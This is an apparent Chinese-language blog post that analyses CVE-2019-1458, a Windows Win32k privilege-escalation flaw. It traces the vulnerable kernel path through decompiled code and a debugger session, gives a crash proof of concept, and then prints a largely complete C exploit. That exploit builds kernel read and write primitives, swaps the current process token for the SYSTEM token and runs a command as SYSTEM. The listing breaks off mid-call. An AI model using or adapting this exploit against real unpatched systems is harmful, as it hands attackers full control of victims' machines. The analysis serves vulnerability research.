CVE-2019-1458 分析

最新推荐文章于 2023-10-18 09:40:14 发布
最新推荐文章于 2023-10-18 09:40:14 发布
阅读量2.2k 收藏 1
点赞数 1
分类专栏: 漏洞复现与分析 逆向 提权 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41252520/article/details/120308729
版权

CVE-2019-1458

0x00 漏洞简介

CVE-2019-1458Win32k中的特权提升漏洞,Win32k组件无法正确处理内存中的对象时,导致Windows中存在一个特权提升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。然后攻击者可能会安装程序、查看、更改或删除数据;或创建具有完全用户权限的新帐户。

0x01 影响版本

Microsoft Windows 10 Version 1607 for 32-bit Systems
Microsoft Windows 10 Version 1607 for x64-based Systems
Microsoft Windows 10 for 32-bit Systems
Microsoft Windows 10 for x64-based Systems
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for x64-based Systems
Microsoft Windows RT 8.1
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2016

0x03 漏洞分析

【 实 验 环 境 】 : W i n 7   s p 1 _ x 64   7600 \textcolor{green}{【实验环境】:Win7\ sp1\_x64\ 7600} Win7 sp1_x64 7600

漏洞发生在 x x x P a i n t S w i t c h W i n d o w \textcolor{cornflowerblue}{xxxPaintSwitchWindow} xxxPaintSwitchWindow函数中

■ xxxPaintSwitchWindow分析
void __fastcall xxxPaintSwitchWindow(tagWND *pwndSwitch)
{
  ...
  if ( (pwndSwitch->style & 0x10000000) != 0  )//bVisible被置位
  {
    if ( (pwndSwitch->fnid & 0x3FFF) == 0x2A0
      && pwndSwitch->cbwndExtra + 0x128i64 == *(unsigned __int16 *)(gpsi + 0x154) )
    {
      if ( *((char *)&pwndSwitch->1 + 3) < 0 )
        return;
      ExtraBytes = (_QWORD *)pwndSwitch->ExtraBytes;
    }
   if ( ExtraBytes )
   {
      hdcSwitch = (HDC)GetDCEx(pwndSwitch, 0i64, 0x10000i64);
      if ( !*((_DWORD *)ExtraBytes + 0x1B) )
        goto LABEL_11;
      LOBYTE(v3) = 0x12;
      if ( (GetKeyState(v3) & 0x8000u) == 0i64 )//判断Alt键状态
        goto LABEL_25;
      if ( !*((_DWORD *)ExtraBytes + 0x1B) )
      {
LABEL_11:
        if ( GetAsyncKeyState(0x12u) >= 0 )//判断Alt键状态
          goto LABEL_25;
      }
      GetClientRect(pwndSwitch, (char *)ExtraBytes + 92);
      FillRect(hdcSwitch, (char *)ExtraBytes + 0x5C, *(_QWORD *)(gpsi + 3024));
      v5 = -*((_DWORD *)GetDPIMetrics() + 0x13);
      v6 = *((_DWORD *)GetDPIMetrics() + 0x12);
      *((_DWORD *)ExtraBytes + 0x18) -= v5;
      *((_DWORD *)ExtraBytes + 0x1A) += v5;
      v6 *= -2;
      *((_DWORD *)ExtraBytes + 0x17) -= v6;
      *((_DWORD *)ExtraBytes + 0x19) += v6;
     ...
   }
   ...
  }
  ...
}

pwndSwitch表示的是被切换窗口的内核对象,满足4个条件:

  1. 被切换的窗口可视 @line:4
  2. 被切换窗口的 f n i d & 0 x 3 F F F = = 0 x 2 A 0 \textcolor{orange}{fnid \& 0x3FFF == 0x2A0} fnid&0x3FFF==0x2A0
  3. 被切换的窗口的额外数据大小加上0x128的值与 g p s i + 0 x 154 \textcolor{orange}{gpsi + 0x154} gpsi+0x154指向的内存值相等 @line:7
  4. Alt键按下

将会进入到漏洞位置 @line:18,发现从该处开始没有对 ExtraBytes 指向的内存做任何校验就直接写入,而 ExtraBytes 可以通过 S e t W i n d o w L o n g ∗ ∗ \textcolor{cornflowerblue}{SetWindowLong**} SetWindowLong系列函数设置,因此存在任意内存写漏洞。

x x x P a i n t S w i t c h W i n d o w \textcolor{cornflowerblue}{xxxPaintSwitchWindow} xxxPaintSwitchWindow函数可由 x x x S w i t c h W n d P r o c \textcolor{cornflowerblue}{xxxSwitchWndProc } xxxSwitchWndProc函数在某个情况下直接调用,下面对 x x x S w i t c h W n d P r o c \textcolor{cornflowerblue}{xxxSwitchWndProc} xxxSwitchWndProc进行一个简单分析。

■ xxxSwitchWndProc分析
__int64 __fastcall xxxSwitchWndProc(tagWND *pwnd, unsigned int message, __int64 wParam, __int64 lParam)
{
 ...
 if ( LOWORD(pwnd->fnid) == 0x2A0 )
 {
  	switch ( message )
    {
  	...
        case 0x14u:
      	case 0x3Au:
            v10 = *(_QWORD *)(v7 + 336);
            v14[1] = (__int64)pwnd;
            v14[0] = v10;
            *(_QWORD *)(v7 + 336) = v14;
            ++pwnd->head.cLockObj;
            xxxPaintSwitchWindow(pwnd);             // 漏洞函数
            ThreadUnlock1(v12, v11);
            return 0i64;
    }
 }
 ...
  if ( message == 1 )
  {
    LOWORD(pwnd->fnid) = 0x2A0;
    goto LABEL_7;
  }xxxSwitchWndProc
}
  • 当被切换窗口的 f n i d = = 0 x 2 A 0 \textcolor{orange}{fnid==0x2A0} fnid==0x2A0且传递的消息值是0x14或者是0x3A时就能够进入到漏洞函数。

x x x S w i t c h W n d P r o c \textcolor{cornflowerblue}{xxxSwitchWndProc} xxxSwitchWndProc函数进行交叉引用,发现在 x x x W r a p S w i t c h W n d P r o c \textcolor{cornflowerblue}{xxxWrapSwitchWndProc} xxxWrapSwitchWndProc函数中被调用。

__int64 __fastcall xxxWrapSwitchWndProc(tagWND *pwnd, unsigned int message, __int64 wParam, __int64 lParam)
{
  __int64 result; // rax

  if ( (unsigned int)CheckProcessIdentity() )
    result = xxxSwitchWndProc(pwnd, message, wParam, lParam);
  else
    result = 0i64;
  return result;
}

再对 x x x W r a p S w i t c h W n d P r o c \textcolor{cornflowerblue}{xxxWrapSwitchWndProc} xxxWrapSwitchWndProc函数进行交叉引用,发现在 I n i t F u n c t i o n T a b l e s \textcolor{cornflowerblue}{InitFunctionTables} InitFunctionTables函数中,将 x x x W r a p S w i t c h W n d P r o c \textcolor{cornflowerblue}{xxxWrapSwitchWndProc} xxxWrapSwitchWndProc函数指针保存在 g p s i + 0 x 40 \textcolor{orange}{gpsi+0x40} gpsi+0x40位置。目前看来没有哪个系统函数显示的调用了 x x x W r a p S w i t c h W n d P r o c \textcolor{cornflowerblue}{xxxWrapSwitchWndProc} xxxWrapSwitchWndProc,所以我们需要找到某个能够调用 g p s i + 0 x 40 \textcolor{orange}{gpsi+0x40} gpsi+0x40的函数。幸运的是这样的函数一抓一大把,正是NtUserfn开头的函数。这些函数内部有个统一的特征,就是根据dwType参数与gpsi做计算,调用位于gpsi某个位置的函数,就拿 N t U s e r f n N C D E S T R O Y \textcolor{cornflowerblue}{NtUserfnNCDESTROY} NtUserfnNCDESTROY举例

__int64 __fastcall NtUserfnNCDESTROY(__int64 a1, __int64 a2, __int64 a3, __int64 a4, __int64 a5, char dwType)
{
  return (*(__int64 (__fastcall **)(__int64))(gpsi + 8i64 * ((dwType + 6) & 0x1F) + 16))(a1);
}

所有NtUserfn开头的函数都用着同样的计算方式 @line:3去调用gpsi中的函数。我们想调用的是位于 g p s i + 0 x 40 \textcolor{orange}{gpsi+0x40} gpsi+0x40 x x x W r a p S w i t c h W n d P r o c \textcolor{cornflowerblue}{xxxWrapSwitchWndProc} xxxWrapSwitchWndProc,所以这里传递的dwType可以取值但不限于0

N t U s e r M e s s a g e C a l l \textcolor{cornflowerblue}{NtUserMessageCall} NtUserMessageCall可以调用到NtUserfn开头系列的函数,下面来简单分析一下。

■ NtUserMessageCall分析
__int64 __fastcall NtUserMessageCall(HWND hwnd, unsigned int msg, __int64 wParam, __int64 lParam, __int64 ResultInfo, int dwType, int a7)
{
 ...
 if ( (hwnd == (HWND)0xFFFF || hwnd == (HWND)-1i64) && (dwType == 0x2B7 || dwType == 0x2B8) )
  {
    pwnd = (tagWND *)-1i64;
  }
  else
  {
    pwnd = (tagWND *)ValidateHwnd(hwnd);
	...
  }
  if ( msg < 0x400 )
      v15 = ((__int64 (__fastcall *)(tagWND *, _QWORD, __int64, __int64, __int64, int, int))gapfnMessageCall[*(_BYTE *)(msg - 0x68001000000i64 + 0x2A6390) & 0x3F])(
              pwnd,
              msg,
              wParam,
              lParam,
              ResultInfo,
              dwType,
              a7); 
  ...  
}

@line:14这里根据msg的取值,调用了一个全局函数指针数组中的某个函数。浏览一下gapfnMessageCall的部分元素

.rdata:FFFFF97FFF2A6190 	gapfnMessageCall dq offset NtUserfnNCDESTROY
.rdata:FFFFF97FFF2A6190                                         ; DATA XREF: NtUserMessageCall+12A↑r
.rdata:FFFFF97FFF2A6198                 dq offset NtUserfnNCDESTROY
.rdata:FFFFF97FFF2A61A0                 dq offset NtUserfnINLPCREATESTRUCT
.rdata:FFFFF97FFF2A61A8                 dq offset NtUserfnINSTRINGNULL
.rdata:FFFFF97FFF2A61B0                 dq offset NtUserfnOUTSTRING
.rdata:FFFFF97FFF2A61B8                 dq offset NtUserfnINSTRING
.rdata:FFFFF97FFF2A61C0                 dq offset NtUserfnINOUTLPWINDOWPOS
.rdata:FFFFF97FFF2A61C8                 dq offset NtUserfnINLPDRAWITEMSTRUCT
.rdata:FFFFF97FFF2A61D0                 dq offset NtUserfnINOUTLPMEASUREITEMSTRUCT

@line:14的计算是重点和msg的取值有关,而msg的取值还会决定 x x x S w i t c h W n d P r o c \textcolor{cornflowerblue}{xxxSwitchWndProc} xxxSwitchWndProc函数流程该走向switch中的哪个分支。我们期望的msg取值是0x14或者0x3A,以便从 x x x S w i t c h W n d P r o c \textcolor{cornflowerblue}{xxxSwitchWndProc} xxxSwitchWndProc函数中进入 x x x P a i n t S w i t c h W i n d o w \textcolor{cornflowerblue}{xxxPaintSwitchWindow} xxxPaintSwitchWindow漏洞函数。@line:14IDA的反汇编结果不太准确,需要从汇编代码中去分析

NtUserMessageCall+101                  lea     r11, cs:0FFFFF97FFF000000h	
NtUserMessageCall+108                  movzx   r10d, byte ptr [rsi+r11+2A6390h]	;rsi = msg , r11+2A6390h = MessageTable
																		 ; r10d = MessageTable[rsi]
NtUserMessageCall+111                  mov     [rsp+78h+var_48], eax
NtUserMessageCall+115                  mov     rax, [rsp+78h+ResultInfo]
NtUserMessageCall+11D                  and     r10d, 3Fh
NtUserMessageCall+121                  mov     [rsp+78h+var_50], ebp
NtUserMessageCall+125                  mov     [rsp+78h+var_58], rax
NtUserMessageCall+12A                  call    ds:rva gapfnMessageCall[r11+r10*8]

从汇编代码的结果来看,@line:14正确的反汇编结果应该是

v15 = ((__int64 (__fastcall *)(tagWND *, _QWORD, __int64, __int64, __int64, int, int))gapfnMessageCall[ MessageTable[msg] & 0x3F](
    		 pwnd,
              msg,
              wParam,
              lParam,
              ResultInfo,
              dwType,
              a7); );

MessageTable部分数据:

kd> db fffff960`00050000+2A6390h
fffff960`002f6390  00 c2 00 00 00 00 00 00-00 00 00 00 c3 c4 ec 00  ................
fffff960`002f63a0  00 00 00 00 80 00 00 00-00 00 c3 c5 00 00 00 00  ................
fffff960`002f63b0  00 00 00 00 86 00 00 80-00 00 00 87 88 89 00 4a  ...............J
fffff960`002f63c0  00 80 00 00 00 00 00 00-8b 8c 29 00 a9 00 00 00  ..........).....
fffff960`002f63d0  00 00 00 00 00 00 8d 8e-00 cf 90 00 00 00 00 00  ................
fffff960`002f63e0  00 00 00 91 00 00 00 00-00 00 00 00 00 00 00 00  ................
fffff960`002f63f0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
fffff960`002f6400  a9 00 00 00 00 00 00 00-00 00 00 00 92 92 00 00  ................

根据 @line:14的计算方式,当 m s g = 0 x 14 \textcolor{orange}{msg=0x14} msg=0x14时,取到的函数指针为 N t U s e r f n N C D E S T R O Y \textcolor{cornflowerblue}{NtUserfnNCDESTROY} NtUserfnNCDESTROY;当 m s g = 0 x 3 A \textcolor{orange}{msg=0x3A} msg=0x3A时,取到的函数指针为 s u b _ F F F F F 97 F F F 0 E 3 D B 4 \textcolor{cornflowerblue}{sub\_FFFFF97FFF0E3DB4} sub_FFFFF97FFF0E3DB4,显然 m s g = 0 x 3 A \textcolor{orange}{msg=0x3A} msg=0x3A这种情况下,取到的函数名不是以NtUserfn开头的,结构不符合要求,所以舍去。

下面编写测试POC,验证漏洞。

0x04 漏洞验证

WNDCLASSEXW wcs = { 0 };
wcs.cbSize = sizeof(WNDCLASSEXW);
wcs.cbWndExtra = 8;
wcs.hInstance = GetModuleHandleA(0);
wcs.lpszMenuName = 0;
wcs.lpfnWndProc = DefWindowProcW;
wcs.lpszClassName = L"Trigger";
ATOM atom;
if ((atom = RegisterClassExW(&wcs))==INVALID_ATOM) {
    printf("[!]Error: %d\n", __LINE__ - 1);
    return;
}

//创建一个用于触发漏洞的窗口
HWND hTrigger = CreateWindowExW(0, (LPCWSTR)(unsigned short)atom, NULL, WS_VISIBLE, 
                                0, 0, 0, 0, NULL, NULL, GetModuleHandleA(0), NULL);
if (hTrigger == INVALID_HANDLE_VALUE) {
    printf("[!]Error: %d\n", __LINE__ - 1);
    return;
}

printf("[+]hTrigger = 0x%x\n", hTrigger);

//设置hTrigger的tagWND->ExtraBytes 0x18偏移处的值为无效的内存指针
SetWindowLongPtrW(hTrigger, 0, 'AAAA');
//第一次调用NtUserMessageCall目的是给hTrigger对应的tagWND->fnid赋值0x2A0
NtUserMessageCall(hTrigger, WM_CREATE, 0, 0, 0, 0, 0);

//创建一个类名为#32771的窗口,此窗口的特点是设置[gpsi+0x154]=0x130
HWND hSwitchWnd= CreateWindowExW(0,L"#32771" , L"Switch Window", 0, 0, 0, 0, 0, NULL, NULL, GetModuleHandleA(0), NULL);
if (hSwitchWnd == INVALID_HANDLE_VALUE) {
    printf("[!]Error: %d\n", __LINE__ - 2);
    return;
}

Key_Down(VK_MENU);

//第二次调用NtUserMessageCall目的是触发漏洞
NtUserMessageCall(hTrigger, 0x14, 0, 0, 0, 0, 0);

@line:25先将ExtraBytes偏移为0的位置设置成一个无效指针。

@line:27需要说明一下,窗口创建之初默认其fnid0,所以第一次调用 N t U s e r M e s s a g e C a l l \textcolor{cornflowerblue}{NtUserMessageCall} NtUserMessageCall,其msg传值为1,为的就是利用 x x x S w i t c h W n d P r o c \textcolor{cornflowerblue}{xxxSwitchWndProc} xxxSwitchWndProc修改 f n i d = 0 x 2 A 0 \textcolor{orange}{fnid=0x2A0} fnid=0x2A0

@line:30创建一个类名为#32771的窗口是为了绕过 x x x P a i n t S w i t c h W i n d o w \textcolor{cornflowerblue}{xxxPaintSwitchWindow} xxxPaintSwitchWindow函数中对 g p s i + 154 \textcolor{orange}{gpsi+154} gpsi+154的检查(回顾相应部分的分析的 @line:7)。

@line:36模拟键盘按下Alt键是为了绕过 x x x P a i n t S w i t c h W i n d o w \textcolor{cornflowerblue}{xxxPaintSwitchWindow} xxxPaintSwitchWindow函数中对按键状态的检查(回顾相应部分的分析的 @line:24)。

@line:39第二次调用 N t U s e r M e s s a g e C a l l \textcolor{cornflowerblue}{NtUserMessageCall} NtUserMessageCall,其msg传值为0x14触发漏洞。

通过动态调试我们发现,漏洞成功触发:
在这里插入图片描述

t a g W N D − > E x t r a B y t e s \textcolor{orange}{tagWND->ExtraBytes} tagWND>ExtraBytes成功被修改为一个无效指针,随后对其访问或者修改会则引发系统BSOD

0x05 漏洞利用

回顾之前对 x x x P a i n t S w i t c h W i n d o w \textcolor{cornflowerblue}{xxxPaintSwitchWindow} xxxPaintSwitchWindow的静态分析,函数会修改 E x t r a B y t e s + 0 x 5 C \textcolor{orange}{ExtraBytes+0x5C} ExtraBytes+0x5C开始的0x10个字节数据,通过动态调试发现,实际上是从 E x t r a B y t e s + 0 x 58 \textcolor{orange}{ExtraBytes+0x58} ExtraBytes+0x58处就开始连续修改了24个字节的数据,并且修改后的数据都异常的大:

kd> dq 0x000000000035f6a0+58
00000000`0035f6f8  0000000e`00000000 00000066`ffffffde
00000000`0035f708  00000000`ffffffef 00000000`00000000
00000000`0035f718  00000000`00000000 00000000`00000000
00000000`0035f728  00000000`00000000 00000000`00000000
00000000`0035f738  00000000`00000000 00000000`00000000

所以利用的思路就和之前我另一篇CVE-2016-07255分析的一样。稍有不同的是,在win7 x64sp1下,需要使用 N t U s e r D e f S e t T e x t \textcolor{cornflowerblue}{NtUserDefSetText} NtUserDefSetText代替 S e t W i n d o w T e x t W \textcolor{cornflowerblue}{SetWindowTextW} SetWindowTextW实现写原语,使用 I n t e r n a l G e t W i n d o w T e x t \textcolor{cornflowerblue}{InternalGetWindowText} InternalGetWindowText代替 G e t W i n d o w T e x t W \textcolor{cornflowerblue}{GetWindowTextW} GetWindowTextW实现读原语,函数名不同,用法基本相同。

最后还需要对之前部分内核数据的修改做出修正,否则在窗口关闭的时候会BSOD,这只是防止蓝屏的简单部分。随后我发现,窗口关闭导致蓝屏的问题虽然解决了,然而cmd进程结束导致了系统蓝屏,错误信息如下:

*** Fatal System Error: 0x0000004e
                       (0x0000000000000099,0x0000000000105498,0x0000000000000000,0x0000000000105518)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!RtlpBreakWithStatusInstruction:
fffff800`03cc2f60 cc              int     3
kd> kb
 # RetAddr               : Args to Child                                                           : Call Site
00 fffff800`03dc06d2     : 00000000`00000099 fffffa80`06635b60 00000000`00000065 fffff800`03d09314 : nt!RtlpBreakWithStatusInstruction
01 fffff800`03dc14be     : 00000000`00000003 00000000`00000000 fffff800`03d05ee0 00000000`0000004e : nt!KiBugCheckDebugBreak+0x12
02 fffff800`03ccb004     : fffffa80`06635b60 fffff880`03e48d48 fffff880`03e48c70 fffff800`03cce54b : nt!KeBugCheck2+0x71e
03 fffff800`03d5932c     : 00000000`0000004e 00000000`00000099 00000000`00105498 00000000`00000000 : nt!KeBugCheckEx+0x104
04 fffff800`03d2dce4     : 00000000`000007ff 00000000`00000410 fffff8a0`013356f0 00000000`000003ac : nt!MiBadShareCount+0x4c
05 fffff800`03f87542     : fffff780`00000004 00000000`00000000 00000000`00000001 fffffa80`0370b080 : nt! ?? ::FNODOBFM::`string'+0x17551
06 fffff800`03f87207     : fffffa80`060f1370 00000000`00000008 fffffa80`00000000 fffffa80`00000000 : nt!MmDeleteProcessAddressSpace+0x42
07 fffff800`03cd00b4     : 00000000`00000000 fffffa80`060f1370 fffffa80`060f1340 fffff800`04057915 : nt!PspProcessDelete+0x177
08 fffff800`03dcf439     : fffffa80`060f1370 fffffa80`06814000 fffffa80`06814e48 fffffa80`06814e40 : nt!ObfDereferenceObject+0xd4
09 fffff800`0411b1fe     : fffffa80`00000372 fffffa80`0466f000 fffffa80`060f1370 fffffa80`06814e48 : nt!MmFreeAccessPfnBuffer+0x29
0a fffff800`0413c820     : fffffa80`06635b01 00000000`00000080 fffffa80`0370b740 fffff800`03e57568 : nt!PfpFlushBuffers+0x23e
0b fffff800`03f6e166     : ffffffff`ff676980 fffffa80`06635b60 fffff880`03e48db0 fffffa80`06635b60 : nt!PfTLoggingWorker+0xe0
0c fffff800`03ca9486     : fffff800`03e43e80 fffffa80`06635b60 fffffa80`062f5b60 fffff880`0123fa90 : nt!PspSystemThreadStartup+0x5a
0d 00000000`00000000     : fffff880`03e49000 fffff880`03e43000 fffff880`03e48750 00000000`00000000 : nt!KiStartSystemThread+0x16

我严重怀疑是x64下替换当前进程的TokenSYSTEMToken时会涉及Token对象的引用计数问题,然后我尝试在替换之前给SYSTEMToken引用计数从1增加到210,而在这3种情况下,cmd进程结束还是会BSOD。然而,我手动在Windbg模拟修改cmdTokenSYSTEMToken,在cmd结束后却不会蓝屏。后来我又试着在替换当前cmd进程的Token时做个备份,在cmd进程结束之前再替换回来,结果还是BSOD。这个问题目前还没解决,在线等各位大佬的帮助v^v!

0x06 EXP

#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>

#define EXTRABYTES_SIZE_OFFSET_IN_TAGWND 0xE8
#define STRNAME_OFFSET_IN_TAGWND 0xD8
#define EXTRABYTES_OFFSET_IN_TAGWND 0x128
#define SPWNDLASTACTIVE_OFFSET_IN_TAGWND 0xF0
#define EPROCESS_OFFSET_IN_KTHREAD 0x210
#define TOKEN_OFFSET_IN_EPROCESS 0x208
#define EPROCESS_ENTRY_OFFSET_IN_EPROCESS 0x188
#define PID_OFFSET_IN_EPROCESS 0x180
#define OBJECT_HEADER_SIZE 0x30

typedef struct _LARGE_UNICODE_STRING {
	ULONG Length;
	ULONG MaximumLength : 31;
	ULONG bAnsi : 1;
	PWSTR Buffer;
} LARGE_UNICODE_STRING, * PLARGE_UNICODE_STRING;

typedef struct _THRDESKHEAD {
	HANDLE  h;
	ULONG   cLockObj;
	PVOID   pti;
	PVOID   rpdesk;
	PBYTE   pSelf;
} THRDESKHEAD, * PTHRDESKHEAD;

typedef PVOID(__fastcall* HMValidateHandle_t)(HANDLE, UINT);
extern "C" NTSTATUS  NtUserMessageCall(HANDLE hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii);
extern "C" NTSTATUS  NtUserDefSetText(HANDLE hWnd, PLARGE_UNICODE_STRING plstr);
extern "C" ULONG g_NtUserDefSetText_syscall = 0x107f, g_NtUserMessageCall_syscall = 0x1007;

HMValidateHandle_t HMValidateHandle = 0;

HWND g_hWndList[0x100] = { 0 };
ULONG64 g_spKwnd[0x100] = { 0 };

BOOLEAN Init() {
	int offset = 0;
	ULONG next_code = 0;
	ULONG dwRetBytes = 0;
	int Kernel_Base_index = 0;
	HMODULE hKernel = 0;

	for (int i = 0; i < 0x100; i++) {
		PUCHAR tr = (PUCHAR)IsMenu + i;
		if (*tr == 0xE8)
		{//找到调用HMValidateHandle的指令位置
			offset = *(int*)((PCHAR)IsMenu + i + 1);
			next_code = (ULONG)IsMenu + i + 5;
			HMValidateHandle = (HMValidateHandle_t)(next_code + offset);
			break;
		}
	}

	if (!HMValidateHandle) {
		printf("[!]Error: %d\n", __LINE__ - 1);
		return FALSE;
	}
	printf("[+]Found HMValidateHandle = 0x%p\n", HMValidateHandle);

	return TRUE;
}

ULONG64 readQWORD(PVOID TargetAddr, HWND hWndAttack, HWND hWndVictim, ULONG64 Offset,PULONG64 OldQword) {
	WCHAR qwVal[8] = { 0 };
	ULONG64 ret;
	ret = SetWindowLongPtrW(hWndAttack, Offset, (ULONG64)TargetAddr);
	if (OldQword)*OldQword = ret;
	InternalGetWindowText(hWndVictim, qwVal, sizeof(qwVal));
	return *(PULONG64)qwVal;
}

VOID writeQWORD(
	PVOID TargetAddr, HWND hWndAttack, HWND hWndVictim, ULONG64 Offset, ULONG64 Value,  PULONG64 OldQword
) {
	ULONG64 ret;
	LARGE_UNICODE_STRING data = { 0 };
	ret = SetWindowLongPtrW(hWndAttack, Offset, (ULONG64)TargetAddr);
	if (OldQword)*OldQword = ret;
	data.bAnsi = 0;
	data.Length = 8;
	data.MaximumLength = 0xA;
	data.Buffer = (PWCHAR)&Value;
	NtUserDefSetText(hWndVictim, &data);
}

VOID Exploit(char* cmd) {
	WNDCLASSEXW wcs = { 0 };
	wcs.cbSize = sizeof(WNDCLASSEXW);
	wcs.cbWndExtra = 8;
	wcs.hInstance = GetModuleHandleA(0);
	wcs.lpszMenuName = 0;
	wcs.lpfnWndProc = DefWindowProcW;

	for (int i = 0; i < 0x100;) {
		WCHAR wszClsName[0x20];
		wsprintfW(wszClsName, L"%d", (i + 1) * 1998);
		wcs.lpszClassName = wszClsName;
		if (RegisterClassExW(&wcs)==INVALID_ATOM) {
			continue;
		}
		HWND hTmp = CreateWindowExW(
			NULL,
			wszClsName,
			L"Fuck you",
			WS_VISIBLE,
			0, 0, 0, 0, NULL, 0, GetModuleHandleA(0), 0
		);
		if (hTmp==INVALID_HANDLE_VALUE) {
			continue;
		}
		PTHRDESKHEAD spRdes = (PTHRDESKHEAD)HMValidateHandle(hTmp, 1);
		g_spKwnd[i] = (ULONG64)spRdes->pSelf;
		g_hWndList[i++] = hTmp;
	}

	HWND hWndAttack = 0;
	HWND hWndVictim = 0;
	ULONG64 spKwndAttack = 0;
	ULONG64 spKwndVictim = 0;
	BOOLEAN bOver = FALSE;

	//寻找在内核中位置相距在0xFF0000之内的两个窗口,其余窗口全部销毁
	for (int i = 0; i < 0x100 - 1 && !bOver; i++) {
		for (int j = i + 1; j < 0x100; j++) {
			hWndAttack = g_spKwnd[i] > g_spKwnd[j] ? g_hWndList[j] : g_hWndList[i];
			hWndVictim = (g_spKwnd[i] < g_spKwnd[j]) ? g_hWndList[j] : g_hWndList[i];

			spKwndAttack = (g_spKwnd[i] < g_spKwnd[j]) ? g_spKwnd[i] : g_spKwnd[j];
			spKwndVictim = (g_spKwnd[i] > g_spKwnd[j]) ? g_spKwnd[i] : g_spKwnd[j];

			if (spKwndVictim - spKwndAttack < 0xFF0000)
			{
				g_hWndList[i] = g_hWndList[j] = 0;
				bOver = TRUE;
				break;
			}
		}
	}

	for (int i = 0; i < 0x100; i++)
		DestroyWindow(g_hWndList[i]);

	if (spKwndAttack == 0 || spKwndVictim == 0) {
		printf("[+]Error:%d\n", __LINE__ - 1);
		return;
	}

	printf("[+]spKwndAttack = 0x%p\n", spKwndAttack);
	printf("[+]spKwndVictim = 0x%p\n", spKwndVictim);

	SetWindowLongPtrW(hWndAttack, 0, spKwndAttack+EXTRABYTES_SIZE_OFFSET_IN_TAGWND-0x60);
	//第一次调用NtUserMessageCall目的是给hTrigger对应的tagWND->fnid赋值0x2A0
	NtUserMessageCall(hWndAttack, WM_CREATE, 0, 0, 0, 0, 0);

	//创建一个类名为#32771的窗口,此窗口的特点是设置[gpsi+0x154]=0x130
	HWND hSwitchWnd= CreateWindowExW(0,L"#32771" , L"Switch Window", 0, 0, 0, 0, 0, NULL, NULL, GetModuleHandleA(0), NULL);
	if (hSwitchWnd == INVALID_HANDLE_VALUE) {
		printf("[!]Error: %d\n", __LINE__ - 2);
		return;
	}

	BYTE keyState[256];
	GetKeyboardState(keyState);
	keyState[VK_MENU] |= 0x80;
	SetKeyboardState(keyState);
	//第二次调用NtUserMessageCall目的是触发漏洞,此时hWndAttack的cbWndExtra已被修改成很大的数
	NtUserMessageCall(hWndAttack, 0x14, 0, 0, 0, 0, 0);

	ULONG64 ulOffset = spKwndVictim - spKwndAttack - EXTRABYTES_OFFSET_IN_TAGWND
		+ STRNAME_OFFSET_IN_TAGWND+8;

	printf("[+]ulOffset = 0x%p\n", ulOffset);
	PTHRDESKHEAD spRdes = (PTHRDESKHEAD)HMValidateHandle(hWndVictim, 1);

	ULONG64 ulOld;

	ULONG64 Ethread = readQWORD(spRdes->pti, hWndAttack, hWndVictim, ulOffset, &ulOld);

	printf("[+]ulOld = 0x%p\n", ulOld);
	printf("[+]Ethread = 0x%p\n", Ethread);
	
	ULONG64 CurEprocess = readQWORD((PVOID)(Ethread + EPROCESS_OFFSET_IN_KTHREAD),
		hWndAttack, hWndVictim, ulOffset, NULL);
	ULONG64 NextEprocess = CurEprocess;
	printf("[+]CurEprocess = 0x%p\n", CurEprocess);

	ULONG64 CurPid = GetCurrentProcessId();
	ULONG64 Pid = 0;
	ULONG64 Token = 0;
	ULONG64 OldToken = 0;
	PVOID TokenAddress = NULL;
	ULONG64 RefCnt;

	do {
		Pid = readQWORD((PVOID)(NextEprocess + PID_OFFSET_IN_EPROCESS),
			hWndAttack, hWndVictim, ulOffset, NULL);
		if (Pid == 4) {
			Token = readQWORD((PVOID)(NextEprocess + TOKEN_OFFSET_IN_EPROCESS),
				hWndAttack, hWndVictim, ulOffset, NULL);
		}
		else if (Pid == CurPid) {
			TokenAddress = (PVOID)(NextEprocess + TOKEN_OFFSET_IN_EPROCESS);
			OldToken = readQWORD((PVOID)(NextEprocess + TOKEN_OFFSET_IN_EPROCESS),
				hWndAttack, hWndVictim, ulOffset, NULL);
		}
		NextEprocess = readQWORD((PVOID)(NextEprocess + EPROCESS_ENTRY_OFFSET_IN_EPROCESS),
			hWndAttack, hWndVictim, ulOffset, NULL)- EPROCESS_ENTRY_OFFSET_IN_EPROCESS;
	} while (NextEprocess != CurEprocess);

	printf("[+]TokenAddress = 0x%p\n", TokenAddress);
	printf("[+]Token = 0x%p\n", Token);

	if (Token && TokenAddress) {
		/*	RefCnt = readQWORD((PVOID)((Token & 0xFFFFFFFFFFFFFFF0) - OBJECT_HEADER_SIZE ),
				hWndAttack, hWndVictim, ulOffset, NULL);
			printf("[+]System token RefCnt = %d\n", RefCnt);*/

		修改令牌前,需要先修改令牌的引用计数
	/*	writeQWORD((PVOID)((Token & 0xFFFFFFFFFFFFFFF0) - OBJECT_HEADER_SIZE),
			hWndAttack, hWndVictim, ulOffset, RefCnt + 2, NULL);*/
	writeQWORD((PVOID)TokenAddress,
		hWndAttack, hWndVictim, ulOffset, (Token & 0xFFFFFFFFFFFFFFF0), NULL);

		printf("[*]Try execute %s as SYSTEM!\n", cmd);
		system(cmd);

	}
	else {
		printf("[-]Privilege escalation Failed!\n");
	}
	防蓝屏操作
	//writeQWORD((PVOID)TokenAddress,
	//	hWndAttack, hWndVictim, ulOffset, OldToken,NULL);

	writeQWORD((PVOID)(spKwndAttack + STRNAME_OFFSET_IN_TAGWND), 
		hWndAttack, hWndVictim, ulOffset, 0,NULL);
	writeQWORD((PVOID)(spKwndAttack + STRNAME_OFFSET_IN_TAGWND+8),
